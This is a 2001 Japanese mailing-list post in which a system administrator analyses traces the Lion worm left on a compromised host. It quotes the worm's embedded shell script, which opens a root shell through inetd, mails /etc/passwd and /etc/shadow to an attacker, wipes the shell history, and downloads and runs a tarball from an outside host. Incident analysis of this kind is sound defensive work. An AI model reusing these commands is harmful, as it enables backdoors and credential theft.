[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:02270] Re: [FYI]: 掲示板の情報など
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:02270] Re: [FYI]: 掲示板の情報など
- From: "ISHIZUKI, Yoko" <yoko@xxxxxxxxxxxx>
- Date: Thu, 29 Mar 2001 19:55:17 +0900
石附です.
On Thu, 29 Mar 2001 14:35:46 +0900
Shikata Koji <koji.shikata@xxxxxxxxxxxx> wrote:
>うーん、ものの本、じゃなくってWWWによると、/etc/shadowも送信する、って
>ことらしいです。
です.
lion が残していったと思われる /dev/.lib/lib/scan/bind というのが
あるのですが, strings コマンドをかけた結果の中に以下のような
ものがあります:
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';
export PATH;
export TERM=vt100;
rm -rf /dev/.lib;
mkdir /dev/.lib;
cd /dev/.lib;
echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.conf;
killall -HUP inetd;ifconfig -a>1i0n;
cat /etc/passwd >>1i0n;
cat /etc/shadow >>1i0n;
mail 1i0nip@xxxxxxxxx <1i0n;
rm -fr 1i0n;
rm -fr /.bash_history;
lynx -dump http://coollion.51.net/crew.tgz >1i0n.tgz;
tar -zxvf 1i0n.tgz;
rm -fr 1i0n.tgz;
cd lib;
./1i0n.sh;
exit;
error
実際はこの部分に改行は入っていません.
shadow もまとめてメイルで送っているようですね.
他にもいろいろ残していっているのですが, 謎なのが
bindname.log というファイルで, IP アドレスがたくさん
書いてあります……
---
石附 陽子. http://www.ishizuki.com/ ICQ #: 8589606
90 F5 8F F7 D9 40 AB 5E FD 13 4C 1D 80 DF 8C F6
保育園ML: http://www.ishizuki.com/hoikuen/
大地ML: http://www.ishizuki.com/daichi/
------------------------------------------------------------------------
★投げる! 打つ! 走る! 春の高校野球放送中!★
○ ◎ http://www.infoseek.co.jp/Kky?pg=kky_top.html&svx=971122 ◎ ○